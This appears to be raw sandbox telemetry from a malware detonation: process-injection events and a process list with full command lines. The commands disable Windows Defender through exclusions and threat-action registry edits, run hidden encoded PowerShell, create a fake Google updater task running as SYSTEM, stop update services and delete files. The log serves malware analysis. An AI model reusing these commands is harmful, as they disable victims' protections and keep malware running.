PID 1536 wrote to memory of 4444 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1536 wrote to memory of 4444 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1536 wrote to memory of 4444 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1536 wrote to memory of 4444 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1536 wrote to memory of 4444 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 3808 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 3808 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 3808 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 3808 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 3808 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 3808 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 4444 wrote to memory of 3696 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\tE5AFUP5eIEX56SyJTaGFNCE.exe
PID 4444 wrote to memory of 3696 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\tE5AFUP5eIEX56SyJTaGFNCE.exe
PID 4444 wrote to memory of 3696 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\tE5AFUP5eIEX56SyJTaGFNCE.exe
PID 4444 wrote to memory of 3468 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 4444 wrote to memory of 3468 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 4444 wrote to memory of 3468 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 4444 wrote to memory of 656 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\SpMwCbcnnE24Y9Cm4FMqbe66.exe
PID 4444 wrote to memory of 656 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\SpMwCbcnnE24Y9Cm4FMqbe66.exe
PID 4444 wrote to memory of 656 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\SpMwCbcnnE24Y9Cm4FMqbe66.exe
PID 4444 wrote to memory of 2952 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\r5retndwSKQXRFWSHGEiAp2x.exe
PID 4444 wrote to memory of 2952 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\r5retndwSKQXRFWSHGEiAp2x.exe
PID 4444 wrote to memory of 2952 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\r5retndwSKQXRFWSHGEiAp2x.exe
PID 4444 wrote to memory of 4148 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe
PID 4444 wrote to memory of 4148 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe
PID 4444 wrote to memory of 4148 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe
PID 4444 wrote to memory of 3160 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe
PID 4444 wrote to memory of 3160 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe
PID 4444 wrote to memory of 4276 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\ajCAHplTtJAZsFYO2cpv1Bao.exe
PID 4444 wrote to memory of 4276 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\ajCAHplTtJAZsFYO2cpv1Bao.exe
PID 4444 wrote to memory of 4276 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\ajCAHplTtJAZsFYO2cpv1Bao.exe
PID 4148 wrote to memory of 2744 N/A C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe
PID 4148 wrote to memory of 2744 N/A C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe
PID 4148 wrote to memory of 2744 N/A C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe
PID 4148 wrote to memory of 4144 N/A C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4148 wrote to memory of 4144 N/A C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4148 wrote to memory of 4144 N/A C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4276 wrote to memory of 4612 N/A C:\Users\Admin\Pictures\ajCAHplTtJAZsFYO2cpv1Bao.exe C:\Users\Admin\AppData\Local\Temp\7zS1AF5.tmp\Install.exe
PID 4276 wrote to memory of 4612 N/A C:\Users\Admin\Pictures\ajCAHplTtJAZsFYO2cpv1Bao.exe C:\Users\Admin\AppData\Local\Temp\7zS1AF5.tmp\Install.exe
PID 4276 wrote to memory of 4612 N/A C:\Users\Admin\Pictures\ajCAHplTtJAZsFYO2cpv1Bao.exe C:\Users\Admin\AppData\Local\Temp\7zS1AF5.tmp\Install.exe
PID 4148 wrote to memory of 5048 N/A C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\allnewumm.exe

"C:\Users\Admin\AppData\Local\Temp\allnewumm.exe"

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe

"C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Random.exe

"C:\Users\Admin\AppData\Local\Temp\Random.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Random.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\Pictures\tE5AFUP5eIEX56SyJTaGFNCE.exe

"C:\Users\Admin\Pictures\tE5AFUP5eIEX56SyJTaGFNCE.exe"

C:\Users\Admin\Pictures\qVMXMu075wJzdK0JO5poj9gi.exe

"C:\Users\Admin\Pictures\qVMXMu075wJzdK0JO5poj9gi.exe"

C:\Users\Admin\Pictures\SpMwCbcnnE24Y9Cm4FMqbe66.exe

"C:\Users\Admin\Pictures\SpMwCbcnnE24Y9Cm4FMqbe66.exe"

C:\Users\Admin\Pictures\r5retndwSKQXRFWSHGEiAp2x.exe

"C:\Users\Admin\Pictures\r5retndwSKQXRFWSHGEiAp2x.exe"

C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe

"C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe" --silent --allusers=0

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\GlPeykXYgfNELRIuXGtYZznP.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\GlPeykXYgfNELRIuXGtYZznP.exe" --version

C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe

C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x2f0,0x6ed874f0,0x6ed87500,0x6ed8750c

C:\Users\Admin\Pictures\ajCAHplTtJAZsFYO2cpv1Bao.exe

"C:\Users\Admin\Pictures\ajCAHplTtJAZsFYO2cpv1Bao.exe"

C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe

"C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe"

C:\Users\Admin\AppData\Local\Temp\7zS1AF5.tmp\Install.exe

.\Install.exe

C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe

"C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4148 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231121225253" --session-guid=79dc5c52-c873-4ed6-b970-4ec9914ceb6f --server-tracking-blob=ZDJlOTI2ZmU5ZWVkNDMzNGE5NGY5YzIxNjc1NDcwZjg0NWMzNDk2NmJkNDEzNmRlMTlkZGYzYmY1MDUwODAzZTp7ImNvdW50cnkiOiJOTCIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwMDYwNzE2Mi41NTQwIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiJmMTY0ZGRmMC1iOWRiLTRkOGUtYTYzOS04ZTMxMTBiNzBhNDgifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0C05000000000000

C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe

C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2e0,0x2f0,0x2f4,0x2bc,0x2f8,0x6ddc74f0,0x6ddc7500,0x6ddc750c

C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe

.\Install.exe /IuCdidQXCBm "385118" /S

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gwusntZYb" /SC once /ST 11:05:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gwusntZYb"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\assistant_installer.exe" --version

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.25 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0xb21588,0xb21598,0xb215a4

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gwusntZYb"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bSTfouYtWkypYZNMeg" /SC once /ST 22:54:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\JzZzCRs.exe\" rd /xzsite_idBSG 385118 /S" /V1 /F

C:\Users\Admin\Pictures\r5retndwSKQXRFWSHGEiAp2x.exe

"C:\Users\Admin\Pictures\r5retndwSKQXRFWSHGEiAp2x.exe"

C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe

"C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\qVMXMu075wJzdK0JO5poj9gi.exe" & del "C:\ProgramData\*.dll"" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3468 -ip 3468

C:\Users\Admin\Pictures\SpMwCbcnnE24Y9Cm4FMqbe66.exe

"C:\Users\Admin\Pictures\SpMwCbcnnE24Y9Cm4FMqbe66.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3468 -s 2176

C:\Windows\SysWOW64\timeout.exe

timeout /t 5

C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\JzZzCRs.exe

C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\JzZzCRs.exe rd /xzsite_idBSG 385118 /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\tE5AFUP5eIEX56SyJTaGFNCE.exe" & del "C:\ProgramData\*.dll"" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3696 -ip 3696

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3696 -s 2104

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\timeout.exe

timeout /t 5

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

